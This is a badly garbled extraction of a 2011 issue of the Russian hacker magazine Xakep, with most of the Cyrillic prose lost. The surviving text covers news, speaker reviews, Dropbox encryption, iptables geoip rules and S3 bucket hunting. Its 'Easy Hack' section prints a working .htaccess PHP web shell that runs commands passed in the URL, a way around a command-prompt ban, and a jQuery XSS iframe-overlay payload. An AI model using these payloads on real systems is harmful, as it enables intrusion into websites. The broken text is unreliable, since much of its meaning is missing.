Вы находитесь на странице: 1из 148

x 08 (151) 2011

.
210
:

. 66

08 (151) 2011

PHDAYS
2011

$ 500 000 APPSTORE

$500 000

APPSTORE
. 28

151

Windows 7 Portable:
Dropbox
@Mail.Ru
HD Moore: Metasploit
Generation Carberp

DNS
REBINDING

SAME ORIGIN POLICY
. 56

3 -
: 12 , 6
3 .

, ? ? .
- .

INTRO

,
whitehat-. ,
. : 142 .
,
.
, : ,
- .
. -
,
.
, .
PHD, Chaos

Constructions (27-28 ).
- DEFCON-
DEFCON-Russia.
, IT .
: http://defcon-russia.ru.
,
. ,
,
. , ,
.
nikitozz, . .
vkontakte.ru/xakep_mag

Content
MegaNews

004

Ferrum
016

018

Samsung SyncMaster T27A950


2.0

PC_Zone
024
028
032
033
034

Dropbox

048
052

060

Proof-of-Concept

072

Windows 7 Portable

Easy-Hack

CONFidence 2011

CTF
PHDays

DNS Rebinding

092


GPU

1000

0day

TDL4

- TDL4

Cloud Hacking

X-Tools

Generation Carberp
Win32/TrojanDownloader.Carberp

J2ME-

iptables

102
108

Web-
Kohana + MVC = love

@Mail.Ru

112

mail.ru

SMS- Android
Scripting Layer for Android:

116

SYN/ACK
120
124
130


SCOM:

ERP !

ERP-: , Open Source

SELinux: !

Anti DNS pinning

MALWARE

080

086

074

066

Metasploit

064

HD Moore

AppStore

game-:
Flash iPhone

Capture The Flag

056

082

098

042

Dropbox: - ,

038

PHREAKING
134


Shield- Arduino

140

FAQ UNITED

143

144

WWW2

FAQ
8.5
web-

024

Dropbox
Dropbox: ,

056

DNS Rebinding
Anti DNS pinning

086


GPU

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
PHREAKING
(po@kumekay.com)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)


>PR-
(grigorieva@glc.ru)

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906

> TECHNOLOGY
(komleva@glc.ru)
>
(olgaeml@glc.ru)
(alekhina@glc.ru)

>
(polikarpova@glc.ru)
>
, birarova@glc.ru
>
( )
(tatarenkova@glc.ru)
>
(ilk@glc.ru)
(goncharova.n@glc.ru)
>
(yakovleva.s@glc.ru)
> -
(alekseeva@glc.ru)
> MAN TV

: 8-800-200-3-999
>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
219 833 .

>

>


.

. ,
,
.


.
.


:
content@glc.ru

, , 2011

>
(kosheleva@glc.ru)
>
(lukicheva@glc.ru)
> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

MEGANEWS
Mifrill (mifrill@real.xakep.ru)

Meganews
ICPC !

. ICPC ,
-- (),

... ,
, . ,
11 .
, , ,
8
.
:
, (8 );
, (7 );
- , (7 );
, (7 );
, (7 ).
,
,
. ,
, ,
, !

Microsoft Security Essentials .


10,66% 43 000 , OPSWAT
. ,
Avira Antivir Personal 10,18%. AVAST!
8,66%.

GEOHOT
GeoHot
Facebook.
Sony : Facebook
...
(Facebook is really an amazing place to work... first hackathon over).
.
,
9- Facebook software engineer. ,
GeoHot
Sony. , ,
.
Facebook , iPad (, ),
. ,
.

004

X 08 /151/ 2011

MEGANEWS

BITTORRENT


BitTorrent. TranzSend Broadcasting Network , BitTorrent Inc Kontiki
Inc 7.301.944
(

) BitTorrent. ,
.

uTorrent, ,
BitTorrent
!

2007
,

1999 , ,

- BitTorrent.
Tranz-Send Broadcasting Network
,

, BitTorrent

,

, P2P- .
,

.
.

?
$8-9 , 60% .
,
.



. .

, , ,
:).

SMS .


GS1. ,

SenseIT, GSM-
SIM-,
,

.



(
-10 50 ),
. ,

GS1 ,
, , /
.
3 000 .

70% Android- -
, Motorola.
, CPU
.
006

X 08 /151/ 2011

MEGANEWS


,
,

.

500 (6,2 )

.
300
(3,7 ) .

,
,
.

DDoS .
,
-


.

,
,
.
303b

( ),

. ,
,
DDoS
.

:
2011 95%.

GOOGLE

Google ,
2009 . Google Voice Search Android, Symbian iOS,
Google Chrome . -, , ,
Chrome, . , ,
,
.
, Google
. Google Images
TinEye. , -

008

( )
-, . ,
. , , ,
Facebook.
Google , (
Google) ,
.
X 08 /151/ 2011

WEXLER.HOME 903


, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .

. , , ,
.

. WEXLER.HOME
750 . ,
, .

WEXLER.HOME 903 Windows 7 .


64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).

Intel Core i5-650 3,2 - 4 . CPU



Turbo Boost, (, ). , .

GeForce GTX 460,


Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.

WEXLER.HOME 903
4 , .

Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.

MEGANEWS

Intel Labs, ,

.
, -

. Termite
,

, . Termite
. ,
, , .
: ,
. ,
,
.
, , ,
.
NICTA, Open Kernel Labs
SOSP.
:
bit.ly/m3dtvt.

,
Foursquare 10 .


Apple.
-,
Mac OS X
Lion. . Mac App Store
29,99 .
250 , , ,
iOS.
:
- -

010

. Mission Control

Launchpad.

Mac App Store. AirDrop
Mac .
-, Apple iOS 5, . 24 !
iPhone Dev Team.
-

,
. , ,
iOS iPod touch.
Cydia iSSH.
.
-,
. Apple
,
.
iTunes Match.
: scan-and-match
( ) iTunes
,
$25
.
,
iTunes,
CD .
,

, ,
TuneCore.
,
, . ,
, ,

.
X 08 /151/ 2011

MEGANEWS

NOKIA
Nokia,
Microsoft , IM for Nokia.
Nokia X6, Nokia 5230, Nokia N8, Nokia E7,
Series 40
.
Ovi Store. ,
,

Google
Talk, Windows Live Messenger, Yahoo!
Messenger
. ,
, ,
iMessage.

iOS 5 ,
.

ICANN
, .
, .apple, .ibm .


Sony
, ,
. ,

. Sony (
),

Sega Pass .

1,3
- Sega Pass.
, ,
.

,
, ,
email ,
( ).
,
LulzSec,
, Sega

. LulzSec, Bethesda, Nintendo, ,


, ,
Dreamcast . , ,

.
,
NATO E-Bookshop. ,
,
, .
,
E-Bookshop , , , , .

, ,
. ,
XSS.


Fluke Networks. OptiView
XG Network Analysis Tablet

.

. ,
Fluke Networks, ,
,
:

012

.
, ,
10 ,
.
2,5 , 10,25- 1024x738,
,
.
Windows 7, Intel Core Duo 1,2
. OptiView XG 30
000

10 /. ,
,

.
X 08 /151/ 2011

BITCOIN

Bitcoin,
peer-to-peer-.
, ,

- . , Bitcoin
. , .
BC MtGox, .
MtGox ( 60
), MD5. ,
,
( 1000 ). , -
, : MtGox
$17 . , ,
, , . ,

432 BC, $8 6,6%
. ,
. , Bitcoin
. , BC
-2011, , . , ( Infostealer.
Coinbit) Bitcoin, , Bitcoin. ,
, , , .

, ...
Microsoft
Rustock, .
. , -
, Microsoft .
,
( ,
) .

, Microsoft ,
Rustock.

. Microsoft ,
, .
noticeofpleadings.com, .
, ,
. ,
, , :). , ,
Rustock, ( 2006 )
- .
.

Facebook, , .
6 ( 155,2
149,4 ).

SKYPE
Skype
. , Microsoft ( Government
Security Program) , .

(skype-open-source.blogspot.com) (
1.x/3.x/4.x),
( , AES RSA ). X 08 /151/ 2011

,
Skype, , .
, , ,
. , ,
,

Skype . ,
,
-.

013

MEGANEWS

, 3D
, , ,
,
- , 3D. ,
(
), ,
, 3D , .
, , 3D,
, ,
.
. ,
. ,

, ,
,
2D. .
, $5
(
). ,
:
, .
, , ,
,
. 3D
!

,
, 2600.

WEXLER TAB 9701


,
, . Wexler

Android 2.3 WEXLER.TAB 9701.
:
ARM- 1,2 ;
512 ;
9,7 SuperTFT- 1024768
IPS
;
8 -.
, , ,
1080p (FullHD).


(, ,
), mini-HDMI.

USB-. (IEEE 802.11 b/g/n) 3G ( Wideband Code Division Multiple Access).

(G-) GPS-,
A-GPS. , - 7000 9
(
Wi-Fi).


12 , 700 . 2011

13,900 .

, Red Hat ( )
$1 .

QR-
QR-
,
, .
,
.
QR-. ,
, ,
.
5

014

.
, ,
10 .
2011 . QR-
: www.
q5g.nl. , ,
,
33 ,
.

X 08 /151/ 2011

SPYEYE


, ,
. ,
, . security-
Trusteer: , SpyEye
Air Berlin AirPlus.
AirPlus :
,
,
. Air Berlin :
,
.
( ) ,
Trusteer.

Chaos Constructions 2011. 11-


27 28
, -.


, ,

. ,


. . ,


,
, .

,
.
, ,

,
(). , ,
?

?,

.
,
.

,
... ,


.

RSA SECURID
RSA Security 40 SecurID,
, - ,
. EMC ,
, SecurID
Lockheed Martin ( - F-22
F-35), . SecurID , . , , ,
30 60 .
, , . ,
,
.
RSA
, SecurID,

,
,
. RSA
,
, .
SecurID ,
, RSA . SecurID
, ,
.

www.xakep.ru
X 08 /151/ 2011

015

FERRUM

:
: 27"
: 1920x1080
: TFT TN
: 300 /2
: 1000:1
: 3
: , RJ-45, 2x USB 2.0,
2x HDMI, , CAM-,
, headphone
: 6,2

28000 .

!
Samsung SyncMaster T27A950
- - ,
CRT-
- ( ).
, ,
, - .
,
, ,
,
-, .
, ? .
. , , ,
.
,
Samsung SyncMaster T27A950. , .


. , 27 . ,
Samsung SyncMaster T27A950

016

. , .
, , .

. -, , . -, .
, . , .


.
14 ,
27 ,
.
.

. ,
DVI-D,
D-Sub. HDMI, ,
, ,
BD-. ,
X 08 /151/ 2011

-
Samsung SyncMaster T27A950 ,
. , ,
--.
,
,
Samsung SyncMaster
T27A950 -.

, .

USB 2.0. ,
, ,
.
-, -
. , - , Samsung SyncMaster T27A950
. ,
USB 2.0 .
-- Wi-Fi-, ( !)
USB-.
,
RJ-45 . , Samsung SyncMaster T27A950
.

3D. ,
2D
3D (, , ).
.
X 08 /151/ 2011


,
Samsung SyncMaster T27A950 , . ,
.
, , .
,
,
. , .


Datacolor Spyder3Elite, :
, 45 60 .
, .
-
.

sRGB. . sRGB
, ( )
.
.
.

Samsung SyncMaster T27A950 , , ,


.
.
- , ,
, . ,
, ,
, . z

017

FERRUM

2.0
,

.
: ,
..
2.0.

. , ,
. ,
.
-, . ,
,
, ,
, ,
.
-, . , , ,
( ),
. , ,
, .
, , .
, ,
, high-end.
, , , ,
Focal Tools, .
, , ,
-
. ,
, . Armin Van Buuren
Ray Brown ( ,
,
), Jackyl ( ) Diana Krall
(

). , .
.

018

:
DVD- Alpine DVA-9861Ri
+ 2RCA to mini-jack

:
Focal Tools
IASCA Official Sound Quality Reference CD
AMT SQ

:
Creative Gigaworks T40 series II
Edifier C200
Edifier R2000T
JBL Duet III
Microlab H11
Sven Stream Mega



Microlab Solo 15 . ,
Edifier C200.
, ,
, , ,
.
,
.
X 08 /151/ 2011

3900 .

Creative Gigaworks
T40 series II
:
: 2.0
: AUX, - X-30
:
: 216 RMS
/: 80
:
:
: 32518090

Gigaworks T40 series II ,


.
. ,
, .
. , ,
. - Creative Docking Station
X-30 iPod,
. , iPod, ,
AUX-,
.
,
, ,
, .
,
. . ,
.
.
- iPod.
.
.

4670 .

Edifier C200
:
: 2.0
: AUX
:
: 225 RMS
/: 85
:
:
: 320253196 (), 22321872 ()

,
Hi-Fi-, Edifier C200.
-, , , ,
, . -, Edifier C200
LED-,
/ .
, .
, AUX,
, , DVD-,
,
. , ,
Edifier C200 .
.

. ,
, , .
. ,
, . Edifier C200 ( ,
) . ,
200 .
.
, .

.

X 08 /151/ 2011

019

FERRUM

5850 .

3800 .

Edifier R2000T

JBL Duet III

: 2.0
:
:
: 230 RMS
/: 95
:
:
: 320253x196

: 2.0
:
:
: 210 RMS
/: 70
:
:
: 304117117

R2000T ,
,
.
,
.
, , , .
, . , , ,
, .
, 200. 6,5- ,
.
.
R2000T , , ,
.
.

Harman/Kardon
.
-.

( 4 ) .
.
,
.
, . ,
.
.
, . , , ,

. , , ,
, .

.
.

020

, .
.
.

X 08 /151/ 2011

FERRUM

3900 .

Microlab Solo 15
:
: 2.0
:
:
: 240 RMS
/: 80
:
:
: 315238168

,
. ,
. , , ,
: 13-
, .
, , . : , ,
,
.
:
; , ,
; ,
.
, Solo 15
.
,
.

3960 .

Sven Stream
Mega
:
: 2.0
:
:
: 260 RMS
/: /
:
:
: 360255255

Hi-Fi, .
,
mini-jack-
. ,

.
6,5- .
.
,
, . .
Stream Mega .
,
. ,
(,
), .

.
.
.

022

X 08 /151/ 2011

>> coding

PC_ZONE
Step (twitter.com/stepah)

Dropbox

Dropbox:
,
Dropbox 5
. 25 .
,
.

Dropbox . 4
. , ,
, security- (pastebin.
com/yBKwDY6T).
, ,
Dropbox.
,
,
. , SSL-, (AES-256).
,
, , ,
, Dropbox
. .
, -, ,
- .
,

024

, Dropbox. .

EncFS

, wiki (wiki.dropbox.com),
. ,
,
. ,
Dropbox TrueCrypt FreeOTFE
.
: , .
, .
: ,
(, 1 ). ,
Dropbox, . ,
wiki
file-by-file-,
. EncFS, X 08 /151/ 2011


.
EncFS - ( , Dropbox)
.
-
. ,
, EncFS
Dropbox. , Dropbox
. ,
Linux FUSE (Filesystem
in Userspace),
. ,
Mac OS X, Windows. .

Windows
Dropbox
BoxCryptor (www.boxcryptor.com), .
AES-256.

, , Dropbox, ,
.
,
EncFS Windows.
BoxCryptor ,
.
,
Dropbox,
. , ,
.
,
, ,
. Advanced Mode,
BoxCryptor.
, Dropbox .
, BoxCryptor ,
, X 08 /151/ 2011

:
, Dropbox. , .
BoxCryptor
Dropbox, (
X:). Dropbox , . .
BoxCryptor, , (
). .
BoxCryptor encfs6.xml.
EncFS , ,
. , ,
, Dropbox.
, ,
, EncFS Windows encfs4win
(gitorious.org/encfs4win). , , .
, BoxCryptor, Dokan (dokandev.net), FUSE Windows
.

Linux
Linux
EncFS , .
(>= 1.7),
. , , ( 1.6). , ,
Ubuntu 10.10, . . EncFS
GUI- Cryptkeeper:
sudo apt-get install encfs cryptkeeper

Cryptkeeper
Applications System Tools Cryptkeeper
:

025

PC_ZONE

X:
1. Cryptkeeper Import EncFS
folder.
2. ,
( BoxCryptor).
3. ,
.
Cryptkeeper
EncFS: , Cryptkeeper > /home/step/
Documents/Safe. .
GUI-, EncFS- :
encfs ~/Dropbox/BoxCryptor/ ~/BoxCryptor


, .

Mac OS X
EncFS Mac OS X, ,
- .
, .
, EncFS
, \ .
:
1.
EncFS,
. XCode(developer.apple.com). 3- .
2. MacFUSE (code.google.com/p/macfuse), Mac OS X FUSE,
EncFS. MacFUSE.pkg,
.
3. EncFS,
(
Homebrew), :
ruby -e "$(curl -fsSL https://raw.github.com/gist/323731)"

026

SecretSync
4. EncFS
. Homebrew ,
( ):
brew install encfs

5. EncFS !
BoxCryptor ( ~/Dropbox/BoxCryptor)
, (, ~/
Dropbox/BoxCryptor):
encfs ~/Dropbox/BoxCryptor ~/BoxCryptor

GUI- MacFusion
(www.macfusionapp.org)
EncFS (thenakedman.wordpress.com/encfs).

BoxCryptor EncFS, , ,
X 08 /151/ 2011



BoxCryptor . , -
, .
Portable- BoxCryptor,
. ,
,
. . Portable-
BoxCryptor , . ,
, Dropbox
DropboxPortableAHK (dropportable.ho.am).

Dropbox
7
(bit.ly/dropbox_fail) Dropbox. , config.db.
%APPDATA%\Dropbox SQLite.
host_id
. . .
. config.
db ,
. !
, ,
host_id .

-.
19 Dropbox ,
,
.
26 GitHub Dropship
(github.com/driverdan/dropship), ,
Dropbox. , , .


.
github Dropbox.
Dropbox .

EncFS Mac OS X
Dropbox.
( AES-256)
SecretSync (getsecretsync.com/ss).
Windows Linux,
OS X . ,
Java, ,
.
, BoxCryptor :).
. , ,
- ? , ,
, ,
.
Wuala (www.wuala.com),
.
,
Dropbox. Windows, Linux, Mac,
iPhone Android.
Wuala RSA-2048,
AES-128.
. ,
, .
,
. ,
? ... . -,
X 08 /151/ 2011

19
. , . Dropbox
, ,
, 1% .

. :
Wuala,
( , 4
).
, Wuala- ,
, .
, ,
.
1 , , ( ,
Dropbox), .
, Wuala .
, .
Dropbox ,

. , Wuala .
,
, .
Java-. Drobox+BoxCryptor
. , ,
, . z

027

PC_ZONE
Johnny-K (www.johnny-k.ru)

$500 000

APPSTORE
game-:
Flash iPhone


MacBook Pro.
iPhone - Ragdoll Cannon. , Objective-C
, Mac OS .

, 2008
Flash Ragdoll Cannon.
, .
: (

028

, box2d),
, ,
. . , - , casual- .
X 08 /151/ 2011

Ragdoll Cannon.
$600,
$600, $8000.
, ,
,
$25 000 ,
, . Ragdoll Cannon
Flash-, , ,
.

09/2010 ][.

, , ,
. AppStore ,
iPhone/iPod/iPad. ? .
Objective-C, iPhone/iPad, .
cocos2d,
,
iOS.
- . ,
(
) , ,
-.
, AppStore
Ragdoll Blaster.
, , .
Ragdoll Blaster , -
Ragdoll Cannon. , , ,
.
. Apple
, , . .
iOS , -.

,
Flash-. :
, , - FDGEntertainment, AppStore.
Ragdoll Blaster. ,


X 08 /151/ 2011

Physics Gamebox. AppStore


(
).
:)? . Objective-C
, , , - . , ,
,
- .
,
- , .
AppStore
FDG Physics Gamebox.
: Ragdoll Cannon
Roly-Poly Cannon ( Flash-).
. ,
.
,
(Apple 30 , ).
, ,
, .

HTTP://WWW
links

:
www.johnny-k.ru.

cocos2d
iPhone:
habrahabr.ru/blogs/
macosxdev/122383.

iPhone OS. :
habrahabr.ru/blogs/
macosxdev/86597.

,
, .
.
, ,
, .
Flash-
Cover Orange. ? ,
iOS. ,
.
. , .
,
( ) , . ?
, ,

-. ? ! ?
, ! ? ! ,
! , (
),
. Flash- Cover Orange

029

PC_ZONE

+ = Cover Orange

:
100 . : iPhone/
iPad ! . Objective-C
: ,
. , ,
cocos2d. , .
, 80 .
.
iPad ,
( ),
. , Apple iPhone 4
Retina, .
, .

Apple-

.
( ),
, , Apple, ,
3gs 3g.

. 688 .
3 .
Xcode
- :
. ? -
2008 , - , ,
. , , .
, ,
. ,
.

2010 Cover Orange AppStore


iPad, $1,99.
, Top
25 ( ).
.
! iPhone.
99 . .
!
: , ,
, ,
, ,
-. ,
.
, , .
. .

, Apple
. , . 200 ,

030

X 08 /151/ 2011



iPhone,
iPhone. ,
. ,
.
iPod Touch, iPhone, , GSM-.
Mac, Intel. , .
(
, ).
Mac OS X
( MacOS X + VirtualBox = , bit.ly/iTJOec).
, ,
iOS , Mac iPhone/iPad
. -.
. .

iPhone OS
iPhone SDK (developer.apple.com/iphone).
IDE (XCode),
(GCC), (GDB), , iPhone .
XCode IDE, , , Visual Studio,
.
, Apple
, ( ,
AppStore). iPhone
Objective-C.
C C++, .
,
Obj-C. ,
, .
: Java ActionScript 3.
cocos2d.

. , !

, - .
, Objective-C
.
,
. , ,
, , . -
Apple. - ,
, :
,

. . , - .
.

, Cover Orange . -
. -
-, X 08 /151/ 2011

. , , ,
.

,
, . AppStore,
,
. ?
, .
, ,
Apple,
, ( appfigures.com),
. : , , ? ,

Apple, .
. , .
, 99%
. ,
, , .
, .
. 30 50
Apple. , ,
,
. , ,
,
-. Apple, , .
. ,
, ( ).
, . ,
,
. . , .

. .
.
, ,
, .
$0,99. , ,

. .
Mac OS. cocos2d
.
-, .
, .
AppStore Mac OS.
? -.
, ? -
, , .
-? . -
. ,
, iOS! z

031

PC_ZONE
Step (twitter.com/stepah)
twitter.com/stepah

,
:
. ,
. , ,
( )
.
,

, .
,
IP-. ,
.

IP-

, .
IP- (
/ IP)
, , , .

WIP-Base WIPmania.com.
:
IP-

IP-.
1. IP- (
/ IP).
, ,

WIP-Base WIPmania.com.
IP-.

-, , SQL, CIDR, :
WIP-API ( API );

032

WIP-Plugin (WorldIP- Mozilla


Firefox);
WIP-Map ( IP-
).
: , , , ,
. ,
.
2.
- ,
.
iptables, . ,

,
,
.
geoip xtables-addons iptables,
,
WorldIP- WIPmania
. :
1. xtables-addons (xtablesaddons.sourceforge.net).
2. geoip.

URL static.wipmania.com/static/worldip.
iptables.tar.gz. ,
(,
).
3. .
http-
:
iptables -A INPUT -p tcp --dport 80
-m geoip --src-cc CN -j DROP

WIP-Map
iptables -A INPUT -p tcp --dport 80
-j ACCEPT

-
(, ,
):
iptables -A INPUT -p tcp --dport 80
-m geoip --src-cc RU,UA,BY -j ACCEPT
iptables -A INPUT -p tcp --dport 80
-j DROP


nginx ngx_http_geo_
module, ( bit.ly/jIHTaA). z

X 08 /151/ 2011

PC_ZONE

Proof-of-Concept
-

Google. ,
"index of" + "mp3" -html -htm -php
mp3. .
, (
www.exploit-db.com/google-dorks)
, ,
. ,
. , ,
, ,
. , ,
DigiNinja, Amazon S3.
S3 Simple Storage Server, Amazon. ,
.
( $0,055 ), ($0,01 10 000 ),
( $0,050 ). , .
bucket ( Amazon S3),
. ,
xtoolz/scanner.zip bucket
xakep, , URL http://xakep.
s3.amazonaws.com/xtoolz/scanner.zip.
bucket , .

. , -

Bucket Finder

X 08/151/ 2011

, All.
DigiNinja? S3
bucket, ,
, .
:
<Error>
<Code>AccessDenied</Code>
<Message>Access Denied</Message>
<RequestId>7F3987394757439B</RequestId>
<HostId>kyMIhkpoWafjruFFairkfim383jtznAnwiyKSTxv7+/
CIHqMBcqrXV2gr+EuALUp</HostId>
</Error>
Public bucket

bucket:
<ListBucketResult xmlns="http://s3.amazonaws.com
/doc/2006-03-01/">
<Name>digipublic</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
<Contents>
<Key>my_file</Key>
<LastModified>2011-05-16T10:47:16.000Z</LastModified>
<ETag>"51fff3c9087648822c0a21212907934a"</ETag>
<Size>6429</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
</ListBucketResult>

bucket (Access
Denied), .
URL, bucket
(%bucket_name%.s3.amazonaws.com)
URL. , wordlist
bucket ,
.
, , ,
(
).
, : 403 Forbidden (
) 200 OK ( ).
, ,
. DigiNinja Ruby Bucket Finder (www.digininja.
org/projects/bucket_finder.php), .
wordlist
(2226 ) . 848
131 bucket.
9683 , ,
. z

033

PC_ZONE

Windows 7 PORTABLE

Windows 7,
.
,
: ,
, ,
.
, , Live-,
- recovery-. , , , ,
, , (
). .
Linux, UBCD4Win, Windows XP,
,
Barts PE Builder (www.nu2.nu/pebuilder). ,
, , , ,
, : Windows 2000/XP/2003. :
,
Windows 7. .

,
.
WinBuilder ,
:
LiveXP Windows XP
.
Win7PE Windows 7.
VistaPE-CAPI Vista.
NaughtyPE Windows XP -.
MultiPE Vista
Windows 7.
Win7PE, .

WinBuilder

PeBuilder ,
WinBuilder. , Windows PE (
Windows, CD/DVD/
USB-). , Windows Automated Installation
Kit (WAIK)

034

, Windows 7
:
1. Windows 7 x86 x64, SP1.
2. WinBuilder (winbuilder.net).
exe-,
.
X 08 /151/ 2011


3. Windows Automated Installation Kit for Windows 7 (WAIK).
Windows
1,7 ,
Microsoft (bit.ly/poNn7I),
.
4. Driverpack (driverpacks.net/driverpacks/latest)
,
.
,
, Chipset, LAN,
WLAN Mass Storage driver.

,
.
1. Windows Automated
Installation Kit for Windows 7.
ISO, , : KB3AIK_EN.iso StartCD.exe.
Windows AIK
Setup .
, , WinBuilder
, WAIK
( ).
2. Windows 7 ISO - .
3. WinBuilder.exe -
(, C:\WinBuilder) .
:
.
4. WinBuilder
. ,
Download Center.
, .
:
updates.boot-land.net ( );
win7pe.WinBuilder.net/SE ( Win7PE).
(
Recommended).
Complete
, Download.
5. - WinBuilder
,
, .
bcdedit.exe
(Windows 7) C:\WinBuilder \Projects\
Tools\Win7PE_SE\x86 ( C:\WinBuilder \Projects\Tools\
X 08 /151/ 2011

WAIK
Win7PE_SE\x64 64- ).
:
imagex.exe
wimgapi.dll
wimmount.inf
wimmount.sys
wimserv.exe

WAIK. . WinBuilder ,
.

, ,
. .
1. , Win7PE
SE. Source:
Windows 7.
.
2. , .
Drivers.
%GlobalTemplates%\Drivers_x86.
Explore
. Driverpack, .
,
:
.
3. Tweaks,
. , wallpaper, , .
.
4. WriteMedia
Copy to USB-Device,
USB-, .
5. Play ,
. ,
, :
,

DVD
dvd




. ,

Windows 7.

INFO

info
:
Avira AntiVir:
reboot.pro/14817.
Malwarebytes AntiMalware:
reboot.pro/9351.
Salas Password
Renew:
reboot.pro/2720.

035

PC_ZONE

WinBuilder

VMware
( , ). ,
,
WinBuilder. ,
, .
, .

036

, Win7PE_x86.ISO
WinBuilder\ISO.
6. ,
,
. VirtualTest
( , qEmu, VirtualBox, Virtual PC, VMware). (Best Emulation), WinBuilder
VMWare Workstation, .
.
.
7. , . WinBuilder HP USB Disk Storage Format Tool
USB-.
FAT32 (
) NTFS. .
Grub4Dos, . : -,
( ,
), -, Part List
Whole disk (MBR) Dont search floppy.
Install, ,
Gbur4Dos, . : WinBuilder
USB-.
Windows 7 .
X 08 /151/ 2011


1. ,
Windows 7
(SP1). ,
, . ,
, , WinBuilder .
2. - , ,
. - ,
, . Finalize
Save log file . WinBuilder
: , -
.
3. , www.
paraglidernc.com/WinBuilder (
WinBuilder).
. Projects\Paraglider\WinBuilder.chm.
4.
Portable- (, portableapps.
com),
.

USB-, ,
, ,
. :
Windows 7, . Aero
: .
Windows ( regedit),
PENetwork
( ) Opera USB .
, .

()

,
, (
). . \
WinBuilder\Projects\Win7PE_SE\Apps GUI WinBuider. , ,
, ,
- . .
.
, base64.
, (
).
( Total Commander),
.
:
?. , :
Reboot.pros App Scripts (reboot.pro/forum/65);
Al Jos (al-jo.99k.org).
, Wireshark
Winpcap ( : reboot.pro/14842).
Apps/Network,
.
.
, ,
. Tools Create script...,
WinBuilder . , Softperfect Netscan
X 08 /151/ 2011


(www.softperfect.com/products/networkscanner),
:
//
[main]
Title=NetScan
Description=Netscan from Softperfect
Selected=True
Level=5
Version=1
NoWarning=False
Download_Level=0
// ,
[variables]
%ProgramTitle%=Netscan
%ProgramEXE%=netscan.exe
%ProgramFolder%=netscan
//
[process]
// netscan ,
(
)
CopyProgram,%ScriptDir%\%ProgramFolder%
//
Add_Shortcut,StartMenu,Netscan
Add_Shortcut,Desktop,Netscan
// DLL, .
WinBuilder
Require_FileQ,mgmtapi.dll
Require_FileQ,msvcrt.dll
Require_FileQ,KERNEL32.dll
Require_FileQ,snmpapi.dll
Require_FileQ,USER32.dll
Require_FileQ,WS2_32.dll
Require_FileQ,wsnmp32.dll

reboot.pro,
.
, .
- ,
.
Components Additional Files,
. Directory Example,
, , ,
.

? !
, ,
. ,
. , ( , ), .
, , ,
, -. ,
,
? z

037


GreenDog (agrrrdog@gmail.com)

Easy Hack
1

:

.

:
, . .
. ?

. ,
- , ,
. ,
bit.ly/hPFQ4i.

, .
- , .
,
web-, .
Jeremiah Grossman .
( ) Top
Ten Web Hacking Techniques (bit.ly/gmlXLZ). : OWASP BlackHat USA .
,
- , ,
. , .
.

-:

:
.

:
,
. : ,
, ( ) ,
.

. ,
, :).
www.securityaegis.com. , ,
:
1) Start Run gpedit.msc;
2) User Configuration Administrative Templates;
3 )System Prevent access to the command prompt.

, cmd.exe bat-/

038

cmd.exe bat
cmd-. , vbs
. .
Windows XP .
, cmd.exe
command.com. DOS-,
,
X 08 /151/ 2011

. :
command.com , - (ipconfig, ) .
, cd.
, :
cd | ipconfig

- ,
, . : !
:).

: HTTPS
.

:
HTTP
,
Man-in-the-middle.
, , , . HTTPS HTTP, SSL/
TLS-. SSL
. , ,
, .
, HTTPS . ,
.
. , , MiTM. ! , . HTTPS
,
, web-
www.ssllabs.com/ssldb/analyze.html. : , ,
,
. ,
! - , :).

HTTPS :)

: HTTPS-.

:
.
arp-spoofing-
HTTPS- , .
, MiTM
, ,
(, -,
), - :). HTTPS, .
:)... . ,
.
la-la-la.key. ? Wireshark:
1) HTTPS-;
2) Edit Preferences;
X 08 /151/ 2011

HTTPS-
3) Protocols SSL( );
4) RSA key list :
5) IP- , , ,
192.168.0.100,443,SSL,:\la-la-la.key;
6) Apply.

039

:
MS SQL.

:
, ,
/ .
, ,
-. MS SQL
, , . SQL-:
Select @@version

Nmap:
Nmap sV p1433 <targets>

. www.sqlteam.com/article/sql-server-versions
( )
MS SQL
MS. ,
. , , , .

MS SQL

: -
.

:
,
Eldar Marcussen (bit.ly/mm1ynI). - CMS, Apache .htaccess.
, - , -
, .
, .htaccess
- Apache. httpd.conf , , ,
. .htaccess
httpd.conf (
AllowOverride).
, , .htaccess ,
. , .htaccess
, web- ,
- , .
:

:
XSS-.

:
XSS . , XSS- :
stored/ XSS ,
;
reflected/ XSS
,
.
.
, , .
, XSS -

040

<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
#### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?> #####

, . , .htaccess .
.htaccess , php-.
php- , ,
'c' c .
: http://victim.com/path/.htaccess?c=command.
. Apache
.htaccess, php . Eldar
Marcussen ,
, .
bit.ly/jBHjNz,
bit.ly/lu9CuD.

, .
,
- : <script>alert(document.cookie); </script>. ,
,
.
- , , . ,
HttpOnly,
/ Cookie JavaScript,
: HTTP. ,
. XSS
, .
, XSS-,
, , ,
X 08 /151/ 2011

.
XSS-tracker: bit.ly/9zZU68. , ,

, -
. ? XSS
. . ? ,
.
iframe, , XSS.
, iframe.
, . ,
. , bit.ly/jETYQx, .
, - ,
, ,
. XSS-tracker
.
jQuery .
:
$('body').children().hide();
$('<iframe>')
.css({ position: 'absolute', width: '100%', height: '100%',
top: 0, left: 0, border: 0, background: '#fff' })
.attr('src', 'http://example.com').appendTo('body');
